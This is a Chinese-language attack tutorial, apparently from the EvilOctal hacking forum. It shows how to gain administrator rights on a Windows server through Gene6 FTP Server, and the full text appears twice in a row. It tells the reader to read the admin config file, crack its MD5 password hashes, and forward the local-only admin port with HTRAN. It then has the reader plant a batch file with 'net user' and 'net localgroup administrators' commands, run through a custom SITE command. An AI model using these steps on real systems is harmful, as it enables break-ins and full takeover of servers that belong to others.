信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
by:晓华
Gene6 FTP Server这个FTP软件简 单易用,比SU的安全性高的多.
他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.
这 一点和我们的SU一样,SU的管理端口是43958.
Gene6 FTP Server的帐户配置文件在:C:\Program Files \Gene6 FTP Server\RemoteAdmin\Remote.ini;
如果不在请自己手动查找.具体的不再废话.
[Server]
IP=127.0.0.1,8021\r \n 这个是本地管理IP 和默认管理的端口,端口是可以修改的.
GrantAllAccessToLocalHost=0
[Acct=Administrator] 管 理帐户
Enabled=1
Rights=0
Password=202CB962AC59075B964B07152D234B70 管 理帐户的密码的MD5的加密字符串
[Acct=124] 这个是普通帐号,注意Acct=124这个帐号不是124,而是24;124中的1代表 第一个帐号.
Enabled=1
Password=C8FFE9A587B126F152ED3D89A146B445 MD5的加密字 符串,可以去破解出密码的明文.
Domain=
RootFolder=
Rights=0
IPAccessList=
我 们得到管理密码后如何才能登陆上去管理呢? 我们可以用HTRAN的端口转发功能,把默认管理端口转发到其他端口,
然后进行连接.我们本地事先也 安装一个Gene6 FTP Server软件.然后配置.
新建一个远程FTP管理
HOST 那里输入你要提权的IP
PORT输入你用端口转发工具转发的端口,
USERNAME和PASSWORD输入 Gene6 FTP Server的帐户配置文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的.
不出意外我们就可以连接上 去了.我们可以新建一个普通的帐号.
我这里建一个名为msnhack密码为manhack的帐号然后选择好管理目录,然后我们在权限配置那里配置 好权限.可以全部选上..
这样还不能提权.这里到了我们最核心的一步.
1.写一个能执行命令的批处理文件,并 上传到目标主机.
@echo off
net user hack hack /add
net localgroup administrators hack /add
2. 然后在SITE COMMANDS那个地方再进行配置.
COMMAND那输入你的命令执行的名字.我写的是 HACK DESCRIPTTION这个是写描述的.这里随便你写什么都可以的.
EXECUTE这里输入你的BAT的命令执行文件的路径.也就 是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐号情况.
只有两个帐号.现在我们登陆FTP进 行提权操作.输入提权命令 "quote site hack"
200 Command executed 命令成功 执行.
我们来看下加上帐号没有.
已经多了一个HACK的帐号,权限为管理权限.提升权限已经成功.
by:晓华
Gene6 FTP Server这个FTP软件简 单易用,比SU的安全性高的多.
他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.
这 一点和我们的SU一样,SU的管理端口是43958.
Gene6 FTP Server的帐户配置文件在:C:\Program Files \Gene6 FTP Server\RemoteAdmin\Remote.ini;
如果不在请自己手动查找.具体的不再废话.
[Server]
IP=127.0.0.1,8021\r \n 这个是本地管理IP 和默认管理的端口,端口是可以修改的.
GrantAllAccessToLocalHost=0
[Acct=Administrator] 管 理帐户
Enabled=1
Rights=0
Password=202CB962AC59075B964B07152D234B70 管 理帐户的密码的MD5的加密字符串
[Acct=124] 这个是普通帐号,注意Acct=124这个帐号不是124,而是24;124中的1代表 第一个帐号.
Enabled=1
Password=C8FFE9A587B126F152ED3D89A146B445 MD5的加密字 符串,可以去破解出密码的明文.
Domain=
RootFolder=
Rights=0
IPAccessList=
我 们得到管理密码后如何才能登陆上去管理呢? 我们可以用HTRAN的端口转发功能,把默认管理端口转发到其他端口,
然后进行连接.我们本地事先也 安装一个Gene6 FTP Server软件.然后配置.
新建一个远程FTP管理
HOST 那里输入你要提权的IP
PORT输入你用端口转发工具转发的端口,
USERNAME和PASSWORD输入 Gene6 FTP Server的帐户配置文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的.
不出意外我们就可以连接上 去了.我们可以新建一个普通的帐号.
我这里建一个名为msnhack密码为manhack的帐号然后选择好管理目录,然后我们在权限配置那里配置 好权限.可以全部选上..
这样还不能提权.这里到了我们最核心的一步.
1.写一个能执行命令的批处理文件,并 上传到目标主机.
@echo off
net user hack hack /add
net localgroup administrators hack /add
2. 然后在SITE COMMANDS那个地方再进行配置.
COMMAND那输入你的命令执行的名字.我写的是 HACK DESCRIPTTION这个是写描述的.这里随便你写什么都可以的.
EXECUTE这里输入你的BAT的命令执行文件的路径.也就 是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐号情况.
只有两个帐号.现在我们登陆FTP进 行提权操作.输入提权命令 "quote site hack"
200 Command executed 命令成功 执行.
我们来看下加上帐号没有.
已经多了一个HACK的帐号,权限为管理权限.提升权限已经成功.
